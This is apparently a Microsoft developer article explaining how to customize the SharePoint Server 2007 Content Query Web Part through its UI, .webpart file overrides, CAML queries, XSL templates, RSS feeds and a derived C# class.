The core benefit of the CQWP is to aggregate content from all of the subsites, lists, and libraries so that the content can be displayed in a single view. After the data is queried and returned, the view is rendered by using a set of XSL templates to transform the data into HTML. The CQWP is flexible in its ability to change the XSL—and therefore the display generated by the CQWP—and in the options it provides for querying the information from the site.
With the ability to limit the query to a list type, a content type, and a subtree of URLS, the CQWP already provides a lot of flexibility directly from the UI (UI). In addition, you can export the CQWP and directly change some of the information that is not in the UI, enabling you to create custom queries for the CQWP to use.
Scenario: Crafting Custom Queries for the Content Query Web Part
This article examines creating custom queries for the CQWP, and how the impact of its architecture can affect how you can and cannot use it. In this example, two departments—public relations (PR) and human relations (HR) —both need to communicate with the employees of the organization on the home page. Instead of having two Web Parts on the home page, one with PR information and the other with HR information, the organization decides to include content from both departments on the home page in the same Web Part. Each department will also have a Web Part on its home page that shows only its news.
To start, both the HR and PR sites are subsites of a single site collection. The news for both PR and HR will be based on child content types of a News content type. All of the content types will be set up in the root of the site collection. HR will have an Internal News content type and PR will have a Press Release content type. With this configuration the news from the sites can be rolled up by using the UI of the CQWP.
The HR site will have more subsites from which news will roll up to the home page, but HR does not want the subsites on the HR home page. This will require editing the properties that cannot be modified through the UI by editing the
*.webpart file. The HR department also wants to display news for a custom date range, which requires extending the CQWP to accept parameters.
Finally, we look at a scenario where there is a separate site collection for HR and PR, so the CQWP will not be able to roll up news. Instead, we can replace the CQWP with the SPSiteDataQuery object or search—alternatives which support content from separate site collections.
Customizing the Content Query Web Part Using the UI and the *.webpart File
The UI for the CQWP is the familiar tool pane interface that is used with all Web Parts. The interface is designed to enable the most common query and presentation options and the standard Web Part options, such as title and chrome. Despite the flexible UI for the CQWP, several properties and complex configurations are not available. For certain settings, you must export the Web Part and edit the
*.webpart file manually. As you may know, a
*.webpart file is an XML file that contains the information needed to load and configure the actual WebPart object.
SharePoint Server enables you to export the configuration of most Web Parts by selecting Export from the Web Part menu, as shown in Figure 1.
Figure 1. Web Part edit menu
By selecting Export, you can save the configuration of the Web Part into a
*.webpart file, which is simply an XML file with the class (.NET type) to load, and the configuration for that type. Many Web Parts have properties in their
*.webpart files that are not shown in the UI. As an example, the following code shows the output from a CQWP. In this listing, the individual properties are reordered to improve readability and XML comments are added to make it easier to locate the properties of the CQWP as I describe them in this article.
<?xml version="1.0"?><webParts> <webPart xmlns=""> <metaData> <type name="Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart, Microsoft.SharePoint.Publishing, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c"/> <importErrorMessage>Cannot import this Web Part.</importErrorMessage> </metaData> <data> <properties> <!-- Properties from ContentByQuery --> <!-- ContentByQuery - Property Overrides --> <property name="ListsOverride" type="string"/> <property name="QueryOverride" type="string"/> <property name="ViewFieldsOverride" type="string"/> <property name="WebsOverride" type="string"/> <!-- Overriden by ListsOverride --> <property name="ServerTemplate" type="string">850</property> <!-- Overriden by QueryOverride --> <property name= "AdditionalFilterFields" type="string" null="true"/> <property name= "AdditionalGroupAndSortFields" type="string" null="true"/> <property name="BaseType" type="string"/> <property name="ContentTypeBeginsWithId" type="string"/> <property name= "ContentTypeName" type="string">Article Page</property> <property name="Filter1ChainingOperator" type= "Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart +FilterChainingOperator, Microsoft.SharePoint.Publishing, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c">And</property> <property name="Filter2ChainingOperator" type="Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart +FilterChainingOperator, Microsoft.SharePoint.Publishing, Version=12.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c">And</property> ... </properties> </data> </webPart> </webParts>
After you have a
*.webpart file and have made the changes that you want, you can import the
*.webpart files into SharePoint Server.
To import a *.webpart file
To place the page in Edit mode, on the Site Actions menu, click Edit Page.
Click an Add a Web Part button on one of the Web Part zones on the page.
In the Add Web Parts dialog box that opens, click the Advanced Web Part gallery and options link.
In the catalog zone that appears on the right, click the drop-down arrow to the right of Browse, and then click Import, as shown in Figure 2.
Figure 2. Catalog Zone Import menu
In the catalog zone, click Browse to open the Windows common file dialog box. Select your
*.webpartfile, and then click Open.
Click Upload.
After the
*.webpartfile is uploaded, click Import.
Modifying the UI properties drives changes in the
*.webpart file, and using the
*.webpart files offers a convenient way to reuse the configuration settings whether or not you need to make direct changes to the file. The following sections review the major areas of the tool pane and how you can use these to change the properties you find in the
*.webpart file.
CQWP Query UI
The Query UI of the tool pane includes sections for the source, list type, content type, audience targeting, and filters. These sections enable the CQWP to construct and execute a query by creating an instance of an SPSiteDataQuery object.
Source Section
The Source section shows three sources that the CQWP can use, as shown in Figure 3.
Figure 3. Source section UI
This section enables the user to select areas of the site collection (or another site collection) to include in the search and sets the WebUrl and ListGuid properties of the CQWP. When you select the first option, to search within the current site collection, neither the WebUrl nor the ListGuid is assigned a value. If the second item is selected, to get items from another site, the WebUrl is set to the selected site. If you select the third option, to get items from a specific list, the WebUrl is set to the Web site containing the list and the list's GUID is added to the ListGuid property. The WebsOverride property, discussed in detail later in this article, is not included in the UI. It would enable you to control whether only the Web is searched or whether the entire site collection is searched when the ListGuid is not present.
List Type Section
The List Type section enables you to select the type of list to include results from, as shown in Figure 4. These options filter the results to only those items found in the specified types of lists.
Figure 4. List Type section UI
This list includes only the default templates and sets the ServerTemplate property of the CQWP. However, you can manually set the ServerTemplate property to the GUID of the feature that installs your custom list, or override the entire SPSiteDataQuery.Lists property by setting the ListsOverride property in the
*.webpart file, as described later in this article.
Content Type Section
Perhaps the most powerful option within the CQWP is the ability to filter results by a content type and the child content types. Figure 5 shows the three-part identification of content types that exists in the Content Type UI.
Figure 5. Content Type section UI
The first selection to make is the group to which the content type belongs. This filters the second drop-down list, which shows the available content types. Unlike the List Type drop-down list, which shows only built-in lists, the Content Type group and items drop-down lists show all of the content types in the current site. The final check box indicates whether to include child content types and changes the property that is set in the CQWP. If the Include child content types check box is selected, the ContentTypeBeginsWithId property is set to the content type identifier (ID) for the content type. If the check box is not selected, the ContentTypeName property is set. The CQWP will execute a query with the "begins with" operator against the ContentTypeId for the value in the ContentTypeBeginsWithId property, or an "equal" operator against the ContentType for anything in ContentType name.
Including child content types is a great way to limit your results to a type of content while enabling users and other developers to derive from your content types. For example, you can filter to the News content type while allowing the HR department to have their own HR news content type that is derived from the News content type.
Audience Targeting Section
One of the key features in SharePoint Server is the ability to target information to users. You can do this by using Web Part targeting, where only certain sets of users can see a Web Part. You can also do it by specifying audiences on the information itself. The CQWP can process this audience targeting information when returning information to users. As shown in Figure 6, the Audience Targeting section consists of two check boxes.
Figure 6. Audience Targeting section UI
The first check box sets the FilterByAudience property. The second check box sets the ShowUntargetedItems property. As the property name implies, setting a target for content is not required. By selecting this check box, you can show untargeted content. In most cases, untargeted content is intended for all users.
Additional Filters Section
The place to provide filtering on a per-field-value basis is the Additional Filters section. This section enables you to logically "and" or logically "or" up to three individual field queries together. Figure 7 shows the UI for these filters.
Figure 7. Additional Filters section UI
Each one of the filters sets four fields. The first field, for example, sets FilterField1, FilterType1, FilterOperator1, and FilterValue1. FilterField is the GUID for the site column to match to. The FilterType is type of the field from the SPFieldType enumeration. The FilterOperator is one of the values from the Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart.FilterFieldQueryOperator enumeration. One other set of properties are controlled by this block—the Filter?ChainingOperator fields (where ? is 1 or 2). These are the operators that "or" or "and" the values in the filtered fields together.
In addition to the filtering for content types, these basic combinations can handle most query needs. However, if the query need for the Web Part is complex, you can override the query altogether, including both the filtering here and the sorting and grouping described in the following section, by setting the QueryOverride property.
CQWP Presentation Group UI
The Presentation group consists of a Grouping and Sorting section, a Styles section, and a Feed section.
Grouping and Sorting Section
The Grouping and Sorting section, as shown in Figure 8, orders the results that are returned from the query.
Figure 8. Grouping and Sorting section UI
The initial Group items by option controls which field is used to group items together. This is set in the GroupBy field as the GUID of the field. The GroupByFieldType is also set to the SPFieldType enumeration value for the type of field that is being used.
The direction of grouping is specified in the GroupByDirection field as a value from the enumeration Microsoft.SharePoint.Publishing.WebControls.ContentByQueryWebPart.SortDirection. The number of columns, which is used in the presentation of the results, is stored in the DisplayColumns property.
The next section for sorting uses the properties SortBy, SortByFieldType, and SortByDirection with the same types of values as were used for the grouping fields.
The last group of items in this section enable you to limit the maximum number of records returned, which sets the ItemLimit property that is provided to SPSiteDataQuery as RowLimit. This is particularly useful when you want to show only a few items, such as on the home page.
Styles Section
The Styles section provides two drop-down lists for selecting the group and styling items, as shown in Figure 9.
Figure 9. Styles section UI
The Styles section sets the GroupStyle and ItemStyle properties, which are used to select which formatting template in the XSL files to use to display the results. The structure of the XSL files and how these values relate are described in detail in Customizing the User Experience.
Feed Section
The final section in the Presentation group, Feed, enables the user to control the visibility of a feed link and the feed's title and description, as shown in Figure 10.
Figure 10. Feed section UI
The Feed section sets the FeedEnabled property to true or false. It also sets the FeedTitle and FeedDescription properties to the values provided.
Changing the CQWP Query
The preceding section describes how UI changes drive changes in the properties of the CQWP, and how you can use those settings to create queries that return the results you need. However, the CQWP is extensible beyond the capabilities of the UI. Figure 11 shows the properties of the CQWP and their relationship to the SPSiteDataQuery object that the CQWP uses. The green boxes are properties that can be set from the UI and the blue boxes are properties that must be set by directly editing the Web Part file. In the diagram, you can see how many individual properties that are set in the UI roll up into a set of properties that are used for the SPSiteDataQuery object. In addition to being able to manually set the values that can be set through the UI, you can also set "override" properties that will override the normal generation of the fields that the SPSiteDataQuery needs.
Figure 11. CQWP properties and their relationship to SPSiteDataQuery
The UI provides a set of properties that should meet the needs of most casual users. The additional properties that are available through the
*.webpart file enable more powerful settings that cannot be specified in the UI.
The first property, QueryOverride, is used to override the actual Collaborative Application Markup Language (CAML) that is being executed. The properties WebsOverride and ListsOverride provide important controls on whether subsites are crawled and the lists to include in the search. The properties CommonViewFields and ViewFieldsOverride are used to control what fields are returned in the results set. This is necessary so that the XSL (discussed in the next section) has the additional information needed to be able to display.
QueryOverride Property
When executing a query via SPQuery or SPSiteDataQuery, you can provide a CAML fragment that specifies the query (equivalent to the SQL WHERE clause) and the order (equivalent to the SQL ORDER BY clause). These two CAML fragments control the results that are returned and their order. By default, the CQWP builds this CAML query from the fields specified in the UI. However, by setting the QueryOverride property in the
*.webpart file, you can manually specify these values.
This is useful when you need to include multiple content types that do not have the same parent or include results filtered by more than three fields, or in cases where you want to provide more than one sorting field. Any query that can be executed by SPSiteDataQuery can be supplied to QueryOverride.
Because the properties in the XML file cannot contain embedded XML, any CAML that you need to add to a property must either be encoded or enclosed within a <CDATA> tag which begins with <![CDATA[ and ends with ]]>.
Setting the QueryOverride causes the CQWP to ignore all of the filtering, grouping, and sorting options that are set in the UI.
WebsOverride Property and ListsOverride Property
By default, the CQWP executes its searches across an entire site collection, however, you can prevent CQWP from recursing sites. You do this by overriding the WebsOverride property and setting it to <Webs />. If you want to specify the value of the property and allow subsites, you can specify <Webs Scope='Recursive'/>, which will recurse subsites. You can also set the value to <Webs Scope='SiteCollection' /> so that all results from the site collection are returned.
The ListsOverride property is created by the CQWP normally by using the ServerTemplate value that is specified in the UI. However, the SPSiteDataQuery that the CQWP uses has a default that limits the maximum number of lists that can return data to 1,000. There may be situations where this value must be overriden. If so, you set the ListsOverride exactly as you would provide the value to the SPSiteDataQuery.List property. To limit the search to pages libraries and specify a maximum of 2,000 lists, the value would be as follows.
In the
*.webpart file, this would look like the following.
CommonViewFields and ViewFieldsOverride
After you get the right rows back, it is important to get the right information in those rows. If the information is not in the row, the XSL cannot display it to the user. The CQWP offers two key ways to do this: CommonViewFields and ViewFieldsOverride.
CommonViewFields is a simpler way to add fields because the value in CommonViewFields is the internal name of the field followed by a comma and its type from SPFieldType. Individual fields are separated by semicolons. CommonViewFields is also simpler than ViewFieldsOverride because you do not have to reference all of the fields that the CQWP includes by default. Even without any field settings, the CQWP will include a default set of fields that the XSL expects to receive.
Using the ViewFieldsOverride property is more challenging because it requires that you include all of the default fields plus the fields you want to add. However, if you want to add the title of a site or list to the output, it is the only way to accomplish this. If you want to add your own fields via ViewFieldsOverride, you can start by adding the following and simply appending your fields. The following represents all of the fields that are included natively by CQWP.
<FieldRef ID="{fa564e0f-0c70-4ab9-b863-0177e6ddd247}" Nullable="True" Type="Text" /> <!-- Title --> <FieldRef ID="{94f89715-e097-4e8b-ba79-ea02aa8b7adb}" Nullable="True" Type="Lookup" /> <!-- FileRef --> <FieldRef ID="{1d22ea11-1e32-424e-89ab-9fedbadb6ce1}" Nullable="True" Type="Counter" /><!-- ID --> <FieldRef ID="{28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f}" Nullable="True" Type="DateTime" /><!-- Modified --> <FieldRef ID="{1df5e554-ec7e-46a6-901d-d85a3881cb18}" Nullable="True" Type="User" /><!-- Author --> <FieldRef ID="{d31655d1-1d5b-4511-95a1-7a09e9b75bf2}" Nullable="True" Type="User" /><!-- Editor --> <FieldRef ID="{8c06beca-0777-48f7-91c7-6da68bc07b69}" Nullable="True" Type="DateTime" /><!-- Created --> <FieldRef ID="{543bc2cf-1f30-488e-8f25-6fe3b689d9ac}" Nullable="True" Type="Image" /> <!-- PublishingRollupImage --> <FieldRef ID="{43bdd51b-3c5b-4e78-90a8-fb2087f71e70}" Nullable="True" Type="Number" /> <!-- Level --> <FieldRef ID="{9da97a8a-1da5-4a77-98d3-4bc10456e700}" Nullable="True" Type="Note" /> <!-- Comments --> <FieldRef ID="{61cbb965-1e04-4273-b658-eedaa662f48d}" Nullable="True" Type="TargetTo" /><!-- Audience -->
Notice the Nullable="True" attribute. This tells the CQWP that the row can be returned even if the row does not contain the field. For your fields, you may or may not want to filter the results based on whether the field you are attempting to return exists in the row. Also, notice that you do not want to include the XML comments in the preceding listing in your actual ViewFieldsOverride because the SPSiteDataQuery that CQWP uses does not allow comments in the CAML for view fields. The preceding comments are designed to help you understand what the GUID refers to.
In addition to your own FieldRefs, you can also add the name of the site and the name of the list that the item came from by adding <ProjectProperty Name="Title"/> and <ListProperty Name="Title"/> to the ViewFieldsOverride. These fields will appear in the output as ProjectProperty.Title and ListProperty.Title, respectively. These fields can be useful if you want to show where the data came from.
For more information about displaying additional fields in the CQWP, see How to Display Custom Fields in the Content Query Web Part.
Customizing the User Experience
Now that the query is returning the right results, you can transform those results into the HTML that the users expect. That requires working with the three XSL files that the CQWP uses to transform the data into HTML, knowing what the data that is returned looks like, and having a set of knowledge and tools to make the process easier.
How CQWP Transforms Data into HTML
The SPSiteDataQuery that the CQWP uses to query can easily translate the results into an XML stream. After the results are in an XML stream, you can use the industry-standard XSL to transform the XML in to HTML for display. Transforming XML to HTML is generally performed with one XSL file but to maintain consistency between the three publishing Web Parts that transform information (Summary Links and Table of Contents are the other two) and to minimize the amount of XSL in one file, CQWP uses three different XSL files in the transformation. The properties and the files for these are:
MainXslLink By default, points to
ContentQueryMain.xslin the Style Library. This is the starting point for the XSLT transformation.
HeaderXslLink By default, points to
Header.xslin the Style Library.
Header.xslis responsible for the group styling. To add new group styling options you add it to this file.
ItemXslLink By default, points to
ItemStyle.xslin the Style Library.
ItemStyle.xslis responsible for individual row styling. New row styling options are added to this file.
Understanding how these three files work together to render the HTML output is essential because the CQWP has dependencies on specific items in the XSL files. That makes using simple XSL techniques to dump out the incoming XML more difficult.
The processing flow for the XSLT transformation starts in the
ContentQueryMain.xsl (file pointed to by
MainXslLink) with a match for "/" (the root node), which directly calls the OuterTemplate template. OuterTemplate determines whether the result set is empty. If it is empty and the mode is Edit, it displays the message that the CQWP passed in as a variable. If, however, the result set is not empty, OuterTemplate calls the OuterTemplate.Body template. In either case, if the feed is enabled then the feed is added.
The
OuterTemplate.Body template organizes the results into groups and columns. It does this by calling OuterTemplate.CallHeaderTemplate and OuterTemplate.CallFooterTemplate at the appropriate times. It adds hard-coded separators for the columns between items as needed.
OuterTemplate.CallHeaderTemplate calls the appropriate template in
Header.xsl by using <xsl:apply-templates> with the current node and a mode of "header". In the
header.xsl file pointed to by the HeaderXslLink property, the templates include a match criteria that tests the value of the GroupStyle attribute and a mode of "header". Thus, OuterTemplate.CallHeaderTemplate calls the correct group styling in the header file. The mode attribute of <xsl:template> and the mode attribute of <xsl:apply-templates> match and ensure that the matching template is only one of the header templates.
OuterTemplate.CallFooterTemplate does not call any templates, but instead emits a static
<div> tag with an identifier of "footer".
After OuterTemplate.Body has made the appropriate calls for grouping, it makes a call to OuterTemplate.CallItemTemplate, which in turn calls templates in the
itemstyle.xsl file pointed to by the ItemXslLink property. It does this, generically, by using <xsl:apply-templates> with a mode of "ItemStyle". The <xsl:templates> in the
ItemStyle.xsl include the same mode of "ItemStyle" and a match for the Style attribute. The ContentQueryMain provides for specific handling for NewsRollUpItem, NewsBigItem, and NewsCategoryItem styles because the templates for these styles require additional parameters.
In addition to the templates mentioned previously, there are numerous other templates in the three files that are used for string processing and other utility purposes.
Raw XML Results
Knowing how the data is processed at a high level is a big start to developing your own group and item styles. However, not knowing exactly what the data looks like coming into an XSLT transformation can make building and debugging problems nearly impossible. In most applications of XSLT transformation, you can simply create an XSL file that contains the following.
This code says, effectively, match the root element and select everything inside it and dump it out. The <xmp> tag is an obsolete HTML tag that renders everything inside it instead of trying to decode it as additional markup. This prevents the need to escape all of the output of the XML for display on an HTML page.
If you replace
ContentQueryMain.xsl with just this, you get an error from the CQWP. This is because CQWP expects certain pieces of the
ContentQueryMain.xsl file to be available, including the incoming parameters. To dump the raw XML, you would not replace the entire
ContentQueryMain.xsl file. Instead, you would replace the existing XSL template that matches the root node. On line 27 of the
ContentQueryMain.xsl, you should see the template which looks like the following.
When you change this to the XSL provided earlier, the output of the CQWP should now be the raw XML provided as input. Of course, making a change to
ContentQueryMain.xsl in production is a bad idea because suddenly every CQWP will start dumping out the raw XML instead of the transformed content. That's why it's important to be able to reference a different XSL file for your CQWP, especially for testing.
Referencing Different XSL
The previous section provided the properties in the CQWP that referenced the three files that CQWP uses. These properties are essential so that you can create CQWP instances where the display is unique for a site. By copying the existing
ContentQueryMain.xsl,
Header.xsl, and
ItemStyle.xsl into your files and changing the
MainXslLink,
HeaderXslLink, and
ItemXslLink properties of your CQWP's
*.webpart file, you can work on a completely separate set of styles from those provided by default. You can also avoid the potential that an update will overwrite your hard work.
While the XSL files for most of the transformation just require changes to the CQWP properties in the
*.webpart file, making changes to the Really Simple Syndication (RSS) feed and how it is displayed is a bit more complicated.
Changing the RSS Feed for the CQWP
Each CQWP in SharePoint Server can expose an RSS feed. RSS feeds are readable through a set of RSS reader programs, including the RSS reader included in Internet Explorer 7 (and Internet Explorer 8) and in Outlook 2007. RSS feeds from CQWPs enable you to create news feeds for your site that mirror the items in the CQWPs on the site and that are cached like a regular CQWP.
The RSS feed is enabled through the UI as described earlier. The output of the RSS feed from the CQWP is customizable beyond the title and description available in the UI. To customize the RSS feed, you need to understand how the RSS is link is created.
On line 54 of the
ContentQueryMain.xsl is a definition for a variable named FeedUrl1 as shown here.
The SiteUrl and FeedPageUrl are parameters that the CQWP passes into the XSL. The SiteUrl is the URL of the current site and the FeedPageUrl is
_layouts/feeds.aspx. In the previous code, you can see that the Web, page, and WebPartId are passed into the RSS page,
Feeds.aspx. These parameters allow the page to get an instance of the CQWP Web Part from the SPLimitedWebPartManager. By doing this it can get the query results back from the CQWP. This is how the page will fetch the data necessary for the RSS feed results. The additional parameter on the query string which is not needed to fetch the results is an XSL parameter. This parameter sets which XSL will be used to transform the results from the CQWP into the RSS feed.
The value provided in the XSL parameter matches entries in the
web.config file's <appSettings> tag. By default SharePoint includes the following entry in the
web.config of the Web applications it creates.
The value here is two parts: the prefix of FeedXsl and the suffix of 1, which matches the default XSL parameter passed into the
Feeds.aspx. The value can be any value provided to the
feeds.aspx page, alphabetical or numeric. Obviously, modifying the
web.config file of SharePoint Server is problematic, particularly in a farm, so modifying the RSS feed requires extra configuration management than the previously described solutions for changing the output of the CQWP directly.
To change the way that RSS feeds are generated:
Create a new
Rss.xslwith the changes.
Add an <appSettings> entry for the new
Rss.xmlfile with a new suffix.
Create a new
ContentQueryMain.xslwith a new XSL parameter.
Customize the
*.webpartfor the CQWP to reference the new
ContentQueryMain.xslfile.
You can use these steps to customize the output of the RSS to include only parts of the articles, or to inject other parts of the RSS standard that the built-in transformation does not provide.
For more information about customizing the RSS feed, see How to Customize RSS for the Content Query Web Part.
Working with XSL
If you do not work with XSL every day, it can be a daunting task to stare at the over 600 lines of XSL that make up the three XSL files that CQWP uses to transform the query results and start to work with them. Fortunately, there are tools and references that you can use to make the XSL editing process easier.
Tools
Microsoft's development platform, Microsoft Visual Studio (2005 or later), includes an XML editor with XSL support. The editor includes the ability to view the XSL output and the ability to debug the XSL. Admittedly, the capabilities of Visual Studio to run the XSLT transformation is of limited use because the dependencies between the CQWP and the XSL make it impossible to run the XSL outside of the CQWP.
Microsoft Office SharePoint Designer 2007 also includes an XML and XSL editor you can use to modify the XSL files that the CQWP uses. The benefit of SharePoint Designer as an XML or XSL editor is that it can save files directly into SharePoint Server. This can make the editing cycle for making changes to the CQWP easy.
Finding XSLT References
If you are trying to learn XSL and need a reference guide, Microsoft provides a complete XSLT Reference. You can also use the article How to: Customize XSL for the Content Query Web Part for a step-by-step walkthrough of the customization process.
Troubleshooting CQWP Issues
CQWP issues can really occur in one of two parts. The first part, and where most trouble can occur, is in the query generation. However, problems can occur during the second part, the creation of the view.
Query Generation
Because the CQWP is using SPSiteDataQuery and you an override the CAML used to execute the query, the results from CQWP exhibit the same exacting precision as the SPSiteDataQuery object. This means that a single error in one of the CAML values that you can override—WebsOverride, ListsOverride, QueryOverride, or ViewFieldsOverride—can mean that you will get an error or more likely simply get no results.
The easiest thing to do is to check your results with a direct call to SPSiteDataQuery to see if there is an error returned, and to make quick changes to values to see if you can determine the issue. The code provided as a part of this article includes a Web Part that calls SPSiteDataQuery and exposes the four fields so that they can be edited in the UI. You can use this tool to see how the SPSiteDataQuery is responding to the CAML fragments that you provide to it.
One of the most common problems is not referring to a field by its internal name. Referring to a field by its display name leads to an error.
View Generation
View generation issues generally fall into two categories. Either the field that you're trying to use is not available because it has a different name or was not included, or the XSL that you are using to create the display is incorrect.
Most frequently the field is not included in the ViewFieldsOverride. To verify that you are receiving the data you expect, you can replace your XSL with the XSL discussed earlier in the section Raw XML Results.
Deriving a Class for the Content Query Web Part
The CQWP, also known as Microsoft.SharePoint.Publishing.WebControls.ContentByQuery, is not a sealed class. This means that classes can be derived from it and can thereby be extended with additional new functionality. One of the common requests for the CQWP is to be able to parameterize the query so that one CQWP can be used to serve different content based on the page or a query string parameter. To demonstrate this. you can derive a class from the CQWP and add the ability to do Web Part connections for the three filter values that the CQWP can accept. The following code example shows that deriving a class from the CQWP is straightforward.
using System; using System.Runtime.InteropServices; using System.Web.UI.WebControls.WebParts; using Microsoft.SharePoint; using Microsoft.SharePoint.Publishing.WebControls; namespace CCBQ { [Guid("85b88c85-0bd0-406f-a014-471175c4c4ae")] public class CCBQ : ContentByQueryWebPart { [ConnectionConsumer("Filter 1 Value", "Filter1Value" )] public void ConnectedFilter1Value(IWebPartField field) { field.GetFieldValue(delegate(object val) { FilterValue1 = (string)val; }); } [ConnectionConsumer("Filter 2 Value", "Filter2Value")] public void ConnectedFilter2Value(IWebPartField field) { field.GetFieldValue(delegate(object val) { FilterValue2 = (string)val; }); } [ConnectionConsumer("Filter 3 Value", "Filter3Value")] public void ConnectedFilter3Value(IWebPartField field) { field.GetFieldValue(delegate(object val) { FilterValue3 = (string)val; }); } } }
When placed on a page, you can connect this Web Part to an instance of the QueryString (URL) Filter Web Part to retrieve the value from the query string and pass it to the CQWP. It is also possible to set another filter Web Part on the page which the user types into to filter the data returned from the CQWP.
In our scenario, by using this extended Web Part you can enable the content owners to create their own pages with custom date ranges. The result is a page that can be used for multiple seasons based on values provided by the content owners.
Replacing the Content Query Web Part with SPSiteDataQuery or Search
Although the CQWP is very powerful, it does not fit every situation. In some cases it might be necessary to use other tools for searching, for example, in a situation that requires you to return data from several site collections. The CQWP would not work for you because CQWP returns information from one site collection, so in this case you could write your own Web Part that used multiple SPSiteDataQuery calls and aggregated the results, or you could use the powerful SharePoint Server search functionality to return results.
Deciding whether to use multiple SPSiteDataQuery calls or one search call should be based on two key factors, urgency of updates and performance. Using search requires less resources but will also suffer from a lag between when the item is published and when it is indexed by crawling. Executing multiple SPSiteDataQuery calls allows for more up-to-date information, but means a higher load on the system due to the multiple calls.
If you decide that the best path is to use SPSiteDataQuery, you will find that your WebsOverride is the Webs property, ListsOverride is the Lists property, QueryOverride is the Query property, and the ViewFieldsOverride is the ViewFields property; these are the properties that you must set to execute an SPSiteDataQuery query. This plus RowLimit, and knowing which SPWeb object on which to run the query (the WebUrl) are all that is needed to perform the query portion of the CQWP's job.
If you decide to use the search approach, there are a few more steps that you have to complete from an infrastructure perspective, but the code itself is relatively straightforward. To use the search features in SharePoint Server, the data must be set up as a managed property through the Shared Services Provider (SSP). After setting up the properties to be returned and the properties to be queried, you can execute a search and get results. For more information, see: Search Customization and Development Options in SharePoint Server 2007 and the white paper Managing Enterprise Metadata with Content Types.
If you are interested in seeing SPSiteDataQuery in action and ways that you can use the search system, see SharePoint Search Keyword and SQL Full Text Example (MSDN Code Gallery).
Conclusion
The Content Query Web Part (CQWP) is an amazingly flexible tool for querying and displaying data. From the ease of use provided by the user interface to a set of Web Part properties that enable full control of the query, caching, and display of results—the tool can be customized by the end user, business analyst, and developer. Deriving classes from the CQWP gives you the ability to add new features quickly and easily, such as data connections or paging. A fully customizable XSLT-based transformation of the query results means that you can display the results you get back. In addition, the SharePoint platform provides alternatives for those situations where the CQWP does not meet the needs of your scenario. You can make calls to the same interface that CQWP uses in the SPSiteDataQuery object, or alternatively by using the SharePoint Server search infrastructure.
Additional Resources
For more information, see the following resources:
Web Content Management Resource Center
Configuring and Customizing the Content Query Web Part
How to: Customize the Content Query Web Part by Using Custom Properties
Customizing the Content Query Web Part and Custom Item Styles
-
Andrew Connell's SharePoint Server 2007 WCM Links and Resources
SharePoint Content Query Web Part Examples
SharePoint Developer Center
- | http://msdn.microsoft.com/en-us/library/office/ff380147(v=office.12).aspx | CC-MAIN-2014-15 | refinedweb | 6,829 | 53.51 |
Hi,
I just purchased the board (V2) and trying to mess around.
Followed the instructions and playing with GPIO from Python, however, it gave me “Invalid GPIO pin specified” error.
import mraa
x = mraa.Gpio(0)
Traceback (most recent call last):
File “”, line 1, in
File “/usr/lib/python2.7/dist-packages/mraa.py”, line 755, in init
this = _mraa.new_Gpio(pin, owner, raw)
ValueError: Invalid GPIO pin specified
This is the list of GPIO.
respeaker@v2:~$ mraa-gpio list
00 GPIO91: GPIO
01 VCC:
02 GPIO43: GPIO
03 GPIO127: GPIO
04 GPIO17: GPIO
05 GPIO67: GPIO
06 GND:
07 GPIO13: GPIO
08 I2C2_SCL: I2C
09 I2C2_SDA: I2C
10 VCC:
11 GND:
12 GPIO66: GPIO
respeaker@v2:~$
Could anyone advice please?
Thanks | https://forum.seeedstudio.com/t/invalid-gpio-pin-specified/5780 | CC-MAIN-2021-49 | refinedweb | 122 | 64.3 |
).
GETRLIMIT(2) BSD System Calls Manual GETRLIMIT(2)
NAME
getrlimit, setrlimit -- control maximum system resource consumption created. automatically by
the system. break generated; this normally terminates the process, but may be caught.
When the soft cpu time limit is exceeded, a signal SIGXCPU is sent to the offending process.
RETURN VALUES
A 0 return value indicates that the call succeeded, changing or returning the resource limit. A
return value of -1 indicates that an error occurred, and an error code is stored in the global location
errno.
ERRORS
The getrlimit() and setrlimit() system calls will fail if:
[EFAULT] The address specified for rlp is invalid.
[EINVAL] resource is invalid.
The setrlimit() call will fail if:
[EINVAL] The specified limit is invalid (e.g., RLIM_INFINITY or lower than rlim_cur).
[EPERM] The limit specified would have raised the maximum limit value and the caller is not
the super-user.
LEGACY SYNOPSIS
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
The include files <sys/types.h> and <sys/time.h> are necessary.
COMPATIBILITY
setrlimit() now returns with errno set to EINVAL in places that historically succeeded. It no longer
accepts "rlim_cur = RLIM_INFINITY" for RLIM_NOFILE. Use "rlim_cur = min(OPEN_MAX, rlim_max)".
SEE ALSO
csh(1), sh(1), quota(2), sigaction(2), sigaltstack(2), sysctl(3), compat(5)
HISTORY
The getrlimit() function call appeared in 4.2BSD.
4th Berkeley Distribution June 4, 1993 4th Berkeley Distribution | http://developer.apple.com/documentation/Darwin/Reference/ManPages/man2/setrlimit.2.html | crawl-002 | refinedweb | 234 | 53.27 |
Hi,
I think there was a similar question already asked in which it was asked how to install OpenCV in a Yocto image. After doing that successfully, I tried to cross compile a small application reading frames from a camera. The code follows here:
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <opencv2/core/core.hpp>
#include <opencv2/highgui/highgui.hpp>
#include <opencv2/imgproc/imgproc.hpp>
int main(int argc, char *argv[]){
if (argc < 2){
printf("Usage: cameratest cameraId \n");
return 0;
}
printf("Trying camera at port %s \n", argv[1]);
cv::VideoCapture capture = cv::VideoCapture(atoi(argv[1]));
if (capture.isOpened() == false){
printf("Could not open camera port. \n");
return -1;
}
cv::Mat frame;
int frameCount = 0;
printf("Camera test started. \n");
while(1){
if (! capture.read(frame) ){
printf("Failed reading. \n");
break;
}
printf("Read frame %d \n", frameCount);
}
}
and the CMakeLists.txt file that I'm using here:
cmake_minimum_required(VERSION 2.6)
project(camera_test)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++0x -O3 -fsigned-char -march=armv7-a -mfpu=neon -mfloat-abi=hard")
file(GLOB_RECURSE src/*.cpp)
find_package(OpenCV REQUIRED)
add_executable(camera_test src/camera_test.cpp)
